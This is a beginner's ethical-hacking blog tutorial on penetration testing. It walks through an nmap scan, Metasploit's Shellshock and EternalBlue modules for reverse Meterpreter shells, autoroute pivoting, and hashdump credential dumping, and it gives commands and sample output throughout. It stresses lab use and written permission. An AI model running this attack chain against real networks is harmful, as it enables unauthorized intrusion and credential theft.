You are currently viewing Ethical Hacking: Basic Penetration Testing
Network Ninja Breaking into someone's network

Ethical Hacking: Basic Penetration Testing

Network Ninja Breaking into someone's network

Hack Like a Pro!

Picture this: you’re a cybersecurity tester, staring down a target’s public IP address from the wilds of the internet. Your mission? Break into their network ethically, then leapfrog to other machines inside, all with permission, of course! This guide dives into basic penetration testing, using a public IP to crack the outer shell and pivot across the internal network. It’s like knocking on a castle gate, sneaking in, and exploring the halls, only with code, not swords! In this guide we will walk you through using nmap to scan the network, and then we will progress to using Metasploit to exploit a vulnerability.

Here’s the plan:

  1. Scan the public IP to spot weaknesses.
  2. Exploit an external service to get a foothold.
  3. Pivot inside the network to other machines.
  4. Keep it legal and responsible.

Critical Note: This is for educational use or authorized testing only (e.g., a lab or with explicit written consent). Hacking without permission is illegal, don’t be that person! Let’s get hacking!

Step 1: Recon the Public IP (Scanning with Nmap)

Every internet-facing network has a public IP, like a storefront’s address. We’ll use Nmap to peek at what’s open from the outside.

What You’ll Need:

  • Kali Linux (free, hacker-friendly OS, download from kali.org).
  • A target public IP (e.g., 203.0.113.10, use a test server you control!).

Scan It:

Fire up a terminal:

nmap -sS -p- 203.0.113.10

- -sS: Stealth SYN scan (quiet and quick).
- -p-: Check all 65,535 ports.
- 203.0.113.10: The public IP you’re testing.

Sample Output:

PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http
443/tcp open   https

Open ports! Port 80 (web) or 22 (SSH) could be our ticket in.

Beginner Tip: Install Nmap with sudo apt install nmap if needed. Test on a free online honeypot (like scanme.nmap.org) with permission first, not random IPs!

Step 2: Breach the Wall (Exploit an External Service)

Let’s say port 80 is open, a web server! Many servers run outdated software with holes. We’ll use Metasploit to exploit it and get a foothold.

Launch Metasploit:

msfconsole

Find a Weakness:

Search for a common web exploit (e.g., an old Apache vuln):

search apache

Pick one, like exploit/multi/http/apache_mod_cgi_bash_env_exec:

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 203.0.113.10
set RPORT 80
set LHOST <your-public-IP>
run

- RHOSTS: Target’s public IP.
- RPORT: Port 80 (web).
- LHOST: Your IP (run ifconfig or use a VPN IP).

Success?

If it works, you’ll land a Meterpreter shell, your bridge inside! You’re now on the web server (e.g., 203.0.113.10).

Beginner Boost: No public IP? Use a local lab with VirtualBox, set one VM as the “target” with a public-like IP. Exploits vary—test with known-vulnerable software like Metasploitable.

Step 3: Pivot Inside (Hop to the Internal Network)

You’re in the castle’s gatehouse, now let’s explore! The web server’s on an internal network (e.g., 192.168.1.x). We’ll pivot to other machines.

Check the Lay of the Land:

In Meterpreter:

ipconfig

Might show:

Interface: eth0
IP Address: 192.168.1.10
Subnet Mask: 255.255.255.0

We’re at 192.168.1.10, part of an internal subnet!

Scan the Inside:

Add a route to pivot:

run autoroute -s 192.168.1.0/24

Then scan:

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.1-254
set PORTS 22,80,445
run

Finds live hosts (e.g., 192.168.1.11 with port 445 open, SMB).

Hop Over:

Exploit an internal machine (e.g., EternalBlue again):

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.11
set LHOST 192.168.1.10
run

Another Meterpreter shell! You’ve pivoted from the public IP to an internal host.

Pro Tip: autoroute turns your foothold into a relay, super sneaky!

Step 4: Rule the Realm (What’s Next?)

With a new shell, you can:

  • Grab credentials: hashdump
  • Move files: upload /path/to/tool
  • Keep pivoting: Scan and exploit again.

You’ve gone from a public IP to owning the internal network, all from outside! Now, report those holes to secure the place.

Ethics: Hack for Good

This is real hacking power, use it wisely:

  • Only test networks you own or have written permission for (e.g., a client’s pentest gig).
  • Document findings and help fix vulnerabilities.
  • Know your local laws, unauthorized access is a crime.

You’re a Network Ninja, What’s Next?

Great job, you’ve breached a network from the outside and pivoted like a champ! Set up a lab with Kali and Metasploitable to practice this safely. Want more? Explore our Hacking Guides for advanced tricks. Share your slickest breach on Twitter/X, we’re all ears! See you next time!

Tags: , , ,

Luke Barber

Hey there! I’m Luke, a tech enthusiast simplifying Arduino, Python, Linux, and Ethical Hacking for beginners. With creds like CompTIA A+, Sec+, and CEH, I’m here to share my coding and tinkering adventures. Join me on Meganano for easy guides and a fun dive into tech, no genius required!